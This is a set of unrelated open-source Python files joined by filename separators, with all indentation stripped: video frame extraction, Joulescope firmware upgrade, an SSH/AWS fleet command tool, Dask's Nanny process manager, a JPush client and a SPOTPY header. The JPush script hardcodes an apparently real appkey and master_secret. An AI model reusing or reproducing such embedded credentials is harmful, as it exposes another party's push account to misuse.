for camera_id in range(len(camera_list)):
src_dir = src_dir_dict[data_type]
camera_type = camera_list[camera_id]
dst_dir = './vis/{}/{}'.format(data_type,camera_type)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
video_list = getFiles(src_dir, '.mp4', camera_type)
if data_type == 'test':
video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
if data_type == 'train':
video_list = [v for v in video_list if 'zhaoxinmei' not in v]
all_num = 60000
running_num = 32
running_num = min(running_num,len(video_list))
batch_size = all_num//running_num
split_videos = split(video_list, running_num)
process_list = []
for i in range(running_num):
temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
process_list.append(temp_p)
for temp_p in process_list:
temp_p.start()
for temp_p in process_list:
temp_p.join()
print('END')
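# Hedged usage note (not part of the original script): is_stretch() labels a
# [left_index, right_index] window against the annotated stretch intervals:
# it returns 1 when the window and a stretch contain one another, 0 when the
# best overlap ratio stays below 0.2, and -1 for ambiguous partial overlaps.
# Example with hypothetical frame indices:
#   is_stretch([[100, 300]], 120, 280)  -> 1   (window lies inside the stretch)
#   is_stretch([[100, 300]], 900, 1100) -> 0   (no meaningful overlap)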
|
firmware_manager.py
|
# Copyright 2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.bootloader import Bootloader
from joulescope.driver import bootloader_go
from zipfile import ZipFile
import monocypher
import binascii
import json
import logging
import threading
log = logging.getLogger(__name__)
SIGNING_KEY_PUBLIC = binascii.unhexlify(b'32fe2bed04bbc42fe1b382e0371ba95ec2947045e8d919e49fdef601e24c105e')
VERSIONS = {
'namespace': 'joulescope',
'type': 'firmware-versions',
'version': 1,
'data': {
'format': 'js110_{version}.img',
# alpha
# beta
'production': '1.3.2',
'available': ['1.3.2']
}
}
def load(path):
with ZipFile(path, mode='r') as f_zip:
with f_zip.open('index.json', 'r') as f:
index_bytes = f.read()
with f_zip.open('index.sig', 'r') as f:
index_sig = binascii.unhexlify(f.read())
if not monocypher.signature_check(index_sig, SIGNING_KEY_PUBLIC, index_bytes):
log.warning('integrity check failed: index.json')
return None
index = json.loads(index_bytes.decode('utf-8'))
for image in index['target']['images']:
with f_zip.open(index['data'][image]['image'], 'r') as f:
index['data'][image]['image'] = f.read()
sig = binascii.unhexlify(index['data'][image]['signature'])
if not monocypher.signature_check(sig, SIGNING_KEY_PUBLIC, index['data'][image]['image']):
log.warning('integrity check failed: %s' % (image, ))
return None
return index
def version_required(release=None):
release = 'production' if release is None else str(release)
v = VERSIONS['data'][release]
return tuple([int(x) for x in v.split('.')])
class UpgradeThread:
def __init__(self, device, image, progress_cbk, stage_cbk, done_cbk):
self.device = device
self.image = image
self.progress_cbk = progress_cbk
self.stage_cbk = stage_cbk
self.done_cbk = done_cbk
def run(self):
d = None
try:
d = upgrade(self.device, self.image, self.progress_cbk, self.stage_cbk)
finally:
self.done_cbk(d)
def upgrade(device, image, progress_cbk=None, stage_cbk=None, done_cbk=None):
"""Full upgrade the device's firmware.
:param device: The :class:`Device` or class:`bootloader.Bootloader` instance
that must already be open.
:param image: The image returned by :func:`load`. Alternatively, a path
suitable for :func:`load`.
:param progress_cbk: The optional Callable[float] which is called
with the progress fraction from 0.0 to 1.0
:param stage_cbk: The optional Callable[str] which is called with a
meaningful stage description for each stage of the upgrade process.
:param done_cbk: The optional Callback[object] which is called with
the device on success or None on failure. If done_cbk is provided,
then run the upgrade in its own thread.
:return: The :class:`Device` which is closed.
    :raise IOError: on failure.
"""
if done_cbk is not None:
t = UpgradeThread(device, image, progress_cbk, stage_cbk, done_cbk)
thread = threading.Thread(name='fw_upgrade', target=t.run)
thread.start()
return thread
try:
cbk_data = {
'stages': [
('Load image', 0.05),
('Start bootloader', 0.05),
('Program application', 0.1),
('Start application', 0.05),
('Program sensor', 0.75),
('Done', 0.0),
],
'stage': -1,
}
def next_stage():
cbk(1.0)
cbk_data['stage'] += 1
s, _ = cbk_data['stages'][cbk_data['stage']]
log.info('firmware_upgrade: %s', s)
if stage_cbk:
stage_cbk(s)
def cbk(progress):
previous = 0.0
for idx in range(cbk_data['stage']):
previous += cbk_data['stages'][idx][1]
current = cbk_data['stages'][cbk_data['stage']][1]
if progress_cbk:
progress_cbk(previous + progress * current)
next_stage()
if isinstance(image, str):
image = load(image)
next_stage()
if not isinstance(device, Bootloader):
b, _ = device.bootloader(progress_cbk=cbk)
else:
b = device
try:
next_stage()
rc = b.firmware_program(image['data']['controller']['image'], progress_cbk=cbk)
if rc:
                raise IOError('controller firmware programming failed: %d' % rc)
next_stage()
except:
b.close()
raise
d = bootloader_go(b, progress_cbk=cbk)
next_stage()
d.open()
try:
d.sensor_firmware_program(image['data']['sensor']['image'], progress_cbk=cbk)
finally:
d.close()
if done_cbk:
done_cbk(d)
return d
except:
if done_cbk:
done_cbk(None)
raise
def run():
import sys
from joulescope.driver import scan_require_one
with scan_require_one() as d:
upgrade(d, sys.argv[1], progress_cbk=print, stage_cbk=print)
if __name__ == '__main__':
run()
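# Hedged usage sketch (not part of the original module): the threaded path of
# upgrade(), selected by passing done_cbk as described in its docstring. The
# device handle and image path are hypothetical.
#
#   def on_done(device):
#       print('upgrade ok' if device is not None else 'upgrade failed')
#
#   t = upgrade(open_device, 'js110_1.3.2.img', progress_cbk=print,
#               stage_cbk=print, done_cbk=on_done)
#   t.join()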
|
__init__.py
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import functools
import logging
import os
import re
import signal
import sys
import threading
import boto3
import fabric
try:
import queue
except ImportError:
import Queue as queue
__version__ = "0.5.2"
CHUNK_SIZE = 50
DEFAULT = {"threads": 10, "timeout": 10}
HELP = {
"command": "shell command to execute",
"hosts": "list of IP addresses",
"i": "private key path",
"kind": "AWS resource type (id: instance ID, asg: Auto Scaling Group name, elb: Elastic Load Balancer name, opsworks: OpsWorks layer ID)",
"local": "path to local file",
"public": "prefer public IP addresses",
"region": "AWS region name",
"remote": "path to remote file",
"threads": "number of concurrent connections",
"timeout": "connection timeout in seconds",
"user": "remote server user",
"values": "list of resource identifiers",
"verbose": "show more output",
}
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
log.addHandler(logging.StreamHandler(sys.stdout))
tasks = queue.Queue()
stop = threading.Event()
num_success = 0
lock = threading.Lock()
def inc_success():
global num_success
with lock:
num_success += 1
def ansi(x):
return "\033[{}m".format(x)
def colored(s, code=0, bold=False):
has_attr = code > 0 or bold
if has_attr and sys.stdout.isatty() and "NO_COLOR" not in os.environ:
bold_attr = ansi(1) if bold else ""
return ansi(code) + bold_attr + s + ansi(0)
return s
def red(s):
return colored(s, code=31)
def green(s):
return colored(s, code=32)
def yellow(s):
return colored(s, code=33)
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i : i + n]
class Connection(object):
def __init__(self, host, user, timeout, key_filename, color):
self.host = host
self.color = color
self.conn = fabric.Connection(
host,
user=user,
connect_timeout=timeout,
connect_kwargs={
"key_filename": key_filename,
"auth_timeout": timeout,
"banner_timeout": timeout,
},
)
def print(self, s, color=colored):
for line in s.splitlines():
log.info(self.color(self.host) + "\t" + color(line))
def run(self, command):
self.print("{}\t{}".format(yellow("run"), command))
try:
with self.conn as c:
result = c.run(command, pty=True, hide=True, warn=True, in_stream=False)
except Exception as e:
self.print(str(e), color=red)
else:
if result.ok:
self.print(result.stdout)
inc_success()
else:
self.print(result.stdout, color=red)
def put(self, local, remote):
self.print("{}\t{}\t{}".format(yellow("put"), local, remote))
try:
with self.conn as c:
c.put(local, remote=remote)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def get(self, remote):
local = os.path.join(self.host, os.path.basename(remote))
self.print("{}\t{}\t{}".format(yellow("get"), remote, local))
try:
os.mkdir(self.host)
except OSError:
pass
try:
with self.conn as c:
c.get(remote, local=local)
except Exception as e:
self.print(str(e), color=red)
else:
self.print("ok", color=green)
inc_success()
def find_instance_ids(l):
for s in l:
for match in re.findall(r"[\da-f]{17}|[\da-f]{8}", s):
yield "i-" + match
def describe_instances(client, filters):
reservations = client.describe_instances(Filters=filters)
for reservation in reservations["Reservations"]:
for instance in reservation["Instances"]:
yield instance
def instance_ids_to_ip_addrs(client, instance_ids):
# Send request in batches to avoid FilterLimitExceeded. Use Filters
# instead of InstanceIds to avoid exception on non-existent instance ID
# (e.g. during scale-out or when hastily pasting a bunch of text).
for chunk in chunks(list(instance_ids), CHUNK_SIZE):
filters = [{"Name": "instance-id", "Values": chunk}]
for instance in describe_instances(client, filters):
yield {
"public": instance.get("PublicIpAddress"),
"private": instance.get("PrivateIpAddress"),
}
def opsworks_layer_ids_to_ip_addrs(client, layer_ids):
for layer_id in layer_ids:
instances = client.describe_instances(LayerId=layer_id)
for instance in instances["Instances"]:
yield {
"public": instance.get("PublicIp"),
"private": instance.get("PrivateIp"),
}
def asgs_to_instance_ids(client, asg_names):
asgs = client.describe_auto_scaling_groups(AutoScalingGroupNames=asg_names)
for asg in asgs["AutoScalingGroups"]:
for instance in asg["Instances"]:
yield instance["InstanceId"]
def elbs_to_instance_ids(client, elb_names):
elbs = client.describe_load_balancers(LoadBalancerNames=elb_names)
for elb in elbs["LoadBalancerDescriptions"]:
for instance in elb["Instances"]:
yield instance["InstanceId"]
def print_ip_addrs(ip_addrs, public):
for ip_addr in ip_addrs:
public_ip = ip_addr["public"]
private_ip = ip_addr["private"]
if public and public_ip:
log.info(public_ip)
elif private_ip:
log.info(private_ip)
def get_ip_addrs(values, kind, region_name):
if kind == "opsworks":
opsworks = boto3.client("opsworks", region_name=region_name)
return opsworks_layer_ids_to_ip_addrs(opsworks, values)
elif kind == "id":
instance_ids = find_instance_ids(values)
elif kind == "asg":
autoscaling = boto3.client("autoscaling", region_name=region_name)
instance_ids = asgs_to_instance_ids(autoscaling, values)
elif kind == "elb":
elb = boto3.client("elb", region_name=region_name)
instance_ids = elbs_to_instance_ids(elb, values)
ec2 = boto3.client("ec2", region_name=region_name)
return instance_ids_to_ip_addrs(ec2, instance_ids)
def get_colors():
for bold in (False, True):
for code in range(31, 37):
yield functools.partial(colored, code=code, bold=bold)
def get_conns(args):
colors = list(get_colors())
for i, host in enumerate(args.hosts):
if host:
yield Connection(
host, args.user, args.timeout, args.i, colors[i % len(colors)]
)
def get_tasks(args):
conns = get_conns(args)
if args.tool == "run":
return [functools.partial(conn.run, args.command) for conn in conns]
elif args.tool == "get":
return [functools.partial(conn.get, args.remote) for conn in conns]
elif args.tool == "put":
return [functools.partial(conn.put, args.local, args.remote) for conn in conns]
def worker():
while not stop.is_set():
try:
task = tasks.get_nowait()
task()
tasks.task_done()
except queue.Empty:
break
def run_workers(num_workers):
threads = []
for _ in range(num_workers):
thread = threading.Thread(target=worker)
thread.start()
threads.append(thread)
for thread in threads:
while thread.is_alive():
thread.join(1)
def parse_args():
parser = argparse.ArgumentParser(description="Tiny multi-server automation tool.")
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("--verbose", action="store_true", help=HELP["verbose"])
subparsers = parser.add_subparsers(dest="tool")
aws_parser = subparsers.add_parser(
"ip", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
aws_parser.add_argument("--region", help=HELP["region"])
aws_parser.add_argument("--public", action="store_true", help=HELP["public"])
aws_parser.add_argument(
"kind", choices=("id", "asg", "elb", "opsworks"), help=HELP["kind"]
)
aws_parser.add_argument("values", nargs="+", help=HELP["values"])
run_parser = subparsers.add_parser(
"run", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
run_parser.add_argument("-i", help=HELP["i"])
run_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
run_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
run_parser.add_argument("command", help=HELP["command"])
run_parser.add_argument("user", help=HELP["user"])
run_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
get_parser = subparsers.add_parser(
"get", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
get_parser.add_argument("-i", help=HELP["i"])
get_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
get_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
get_parser.add_argument("remote", help=HELP["remote"])
get_parser.add_argument("user", help=HELP["user"])
get_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
put_parser = subparsers.add_parser(
"put", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
put_parser.add_argument("-i", help=HELP["i"])
put_parser.add_argument(
"--timeout", type=float, default=DEFAULT["timeout"], help=HELP["timeout"]
)
put_parser.add_argument(
"--threads", type=int, default=DEFAULT["threads"], help=HELP["threads"]
)
put_parser.add_argument("local", help=HELP["local"])
put_parser.add_argument("remote", help=HELP["remote"])
put_parser.add_argument("user", help=HELP["user"])
put_parser.add_argument("hosts", nargs="+", help=HELP["hosts"])
return parser.parse_args()
def main():
# Avoid throwing exception on SIGPIPE.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.tool == "ip":
print_ip_addrs(get_ip_addrs(args.values, args.kind, args.region), args.public)
else:
for task in get_tasks(args):
tasks.put_nowait(task)
try:
num_workers = min(args.threads, len(args.hosts))
run_workers(num_workers)
except KeyboardInterrupt:
stop.set()
log.info(red("terminating"))
with lock:
return len(args.hosts) - num_success
if __name__ == "__main__":
sys.exit(main())
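# Hedged usage sketch (not part of the original module): example invocations of
# the argparse interface defined above. The script name, key path and addresses
# are hypothetical placeholders.
#
#   <script> ip asg my-asg --region us-east-1 --public
#   <script> run -i ~/.ssh/key.pem "uptime" ec2-user 10.0.0.1 10.0.0.2
#   <script> put -i ~/.ssh/key.pem local.txt /tmp/remote.txt ec2-user 10.0.0.1
#   <script> get -i ~/.ssh/key.pem /var/log/syslog ec2-user 10.0.0.1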
|
nanny.py
|
import asyncio
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop
from tornado.locks import Event
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
PeriodicCallback,
parse_timedelta,
ignoring,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
    The nanny spins up Worker processes, watches them, and kills or restarts
    them as necessary. It is necessary if you want to use the
    ``Client.restart`` method, or to restart the worker automatically if
    it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = None
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory="dask-worker-space",
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
self.listen_args = self.security.get_listen_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
self.local_directory = local_directory
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_address = address_from_user_args(
host=host,
port=port,
interface=interface,
protocol=protocol,
security=security,
)
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = "init"
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with ignoring(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await self.listen(self._start_address, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == "running":
assert self.worker_address
self.status = "running"
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != "running":
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in ("closing", "closed"):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in ("closing", "closed", "closing-gracefully"):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == "closing-gracefully":
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = "closing-gracefully"
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == "closing":
await self.finished()
assert self.status == "closed"
if self.status == "closed":
return "OK"
self.status = "closing"
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = "closed"
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess(object):
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = "init"
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == "running":
return self.status
if self.status == "starting":
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = "starting"
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = "running"
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != "stopped":
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = "stopped"
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == "stopped":
return
if self.status == "stopping":
await self.stopped.wait()
return
assert self.status in ("starting", "running")
self.status = "stopping"
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != "starting":
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
                raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
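# Hedged usage sketch (not part of this module): starting a Nanny
# programmatically, based on the async start() defined above. The scheduler
# address is a hypothetical placeholder; in practice the dask-worker CLI
# normally creates the Nanny.
#
#   import asyncio
#   async def main():
#       nanny = await Nanny(scheduler_ip="tcp://127.0.0.1:8786", nthreads=2).start()
#       await nanny.finished()
#   asyncio.get_event_loop().run_until_complete(main())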
|
jpush_client.py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from threading import Thread
import requests
import json
appkey = '5a0fe3d99d1d89a25d73b0a4'
master_secret = '8cc1233226324ee29af559d2'
url = 'https://api.jpush.cn/v3/push'
payload = {"platform":["android"],"audience":"all", "options":{"time_to_live":"0", "sendno":0}, "notification":{"alert":"Hi,JPush!"}}
headers = {}
headers['content-type'] = 'application/json;charset=utf-8'
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
        self.func(*self.args)
def mypush(sendno):
payload["options"]["sendno"] = sendno
#print("payload: %r" %(payload))
r = requests.post(url, data=json.dumps(payload), headers=headers, auth=(appkey, master_secret))
print "sendno[%r] response[%r]" %(sendno, r.text)
def main():
sendno_list = [ii+1 for ii in range(100)]
threads = []
for ii in range(len(sendno_list)):
t = Thread(
target=ThreadFunc(mypush, (sendno_list[ii], ), mypush.__name__))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if "__main__" == __name__:
main()
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
    # On Python 2 only the Queue module is available for this purpose. In that
    # case the main process has to pause briefly, otherwise the subprocess is
    # not yet finished and the main process cannot collect it (a garbage-
